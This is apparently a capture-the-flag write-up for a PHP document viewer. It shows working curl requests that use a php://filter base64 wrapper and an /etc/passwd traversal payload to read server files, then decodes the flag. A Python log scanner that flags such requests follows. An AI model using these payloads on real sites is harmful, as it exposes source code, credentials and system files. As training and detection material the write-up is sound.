Category: Web
Flag: SCSC26{b4c4_f1l3_r4h4s14_p4k41_wr4pp3r}
Description: An internal SCSC document management system for viewing company policies. The system loads files dynamically.
A developer hid credentials in the file flag.php, but the file displays nothing when opened in a browser. Can you read the source code of that file?
The service was a PHP document viewer at http://sriwijayasecuritysociety.com:8009/. The home page exposed a page parameter through the sidebar links, so the first check was the index page.
curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/'
HTTP/1.1 200 OK
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33
...
<li><a href="?page=welcome">Welcome</a></li>
<li><a href="?page=policy">IT Policy</a></li>
<li><a href="?page=credits">Credits</a></li>
The description said flag.php did not display anything in the browser, which pointed at reading the source instead of executing the PHP. PHP stream filters can base64-encode a local file before include() evaluates it, so the contents come back as base64 text instead of being run as code. The app also appeared to append .php to the requested page, so requesting resource=flag targeted flag.php.
curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/?page=php://filter/convert.base64-encode/resource=flag'
PD9waHANCiRmbGFnID0gIlNDU0MyNntiNGM0X2YxbDNfcjRoNHMxNF9wNGs0MV93cjRwcDNyfSI7DQovLyBZb3UgbmVlZCB0byByZWFkIHRoZSBzb3VyY2UgY29kZSBvZiB0aGlzIGZpbGUhDQo/Pg==
A direct request for flag.php confirmed the suffix behavior because the include path became flag.php.php.
curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/?page=php://filter/convert.base64-encode/resource=flag.php'
Warning: include(php://filter/convert.base64-encode/resource=flag.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 93
A plain path traversal payload was not accepted; the application answered with its not-found message.
curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/?page=../../../../etc/passwd'
Document not found.
The wrapper output was base64-encoded PHP source. Decoding it revealed the variable assignment.
import base64
s = 'PD9waHANCiRmbGFnID0gIlNDU0MyNntiNGM0X2YxbDNfcjRoNHMxNF9wNGs0MV93cjRwcDNyfSI7DQovLyBZb3UgbmVlZCB0byByZWFkIHRoZSBzb3VyY2UgY29kZSBvZiB0aGlzIGZpbGUhDQo/Pg=='
print(base64.b64decode(s).decode())
<?php
$flag = "SCSC26{b4c4_f1l3_r4h4s14_p4k41_wr4pp3r}";
// You need to read the source code of this file!
?>
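
For the detection side, the following added example (not part of the original write-up or the challenge code) scans access-log lines for stream-wrapper schemes and traversal sequences in the page parameter. The log lines are constructed samples that reuse the request paths shown above; the function names and log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A page name never needs a URL scheme. PHP resolves wrapper names
# case-insensitively, and data: is accepted without the slashes.
SCHEME_RE = re.compile(r"^\s*(?:data:|[a-z][a-z0-9+.\-]*://)", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed Apache combined-format lines; the request paths are the ones
# from the write-up plus a percent-encoded, upper-case form of the same value.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2026:10:00:00 +0000] "GET /?page=welcome HTTP/1.1" 200 2310 "-" "curl"',
    '203.0.113.7 - - [01/Jan/2026:10:00:05 +0000] "GET /?page=php://filter/convert.base64-encode/resource=flag HTTP/1.1" 200 2450 "-" "curl"',
    '203.0.113.7 - - [01/Jan/2026:10:00:09 +0000] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 2290 "-" "curl"',
    '203.0.113.7 - - [01/Jan/2026:10:00:12 +0000] "GET /?page=PHP%3A%2F%2Ffilter/convert.base64-encode/resource=flag HTTP/1.1" 200 2450 "-" "curl"',
]

def classify(value):
    """Label one decoded page value: 'wrapper', 'traversal' or None."""
    if SCHEME_RE.match(value):
        return "wrapper"
    if "../" in value.replace("\\", "/"):
        return "traversal"
    return None

def scan(lines, param="page"):
    """Return (line_number, verdict, decoded_value) for suspicious requests."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes once, matching what PHP puts in $_GET.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == param:
                verdict = classify(value)
                if verdict:
                    hits.append((number, verdict, value))
    return hits

if __name__ == "__main__":
    for number, verdict, value in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: {value}")
```

Matching on the decoded value matters here: the last sample line only looks like a wrapper request after percent-decoding and case folding.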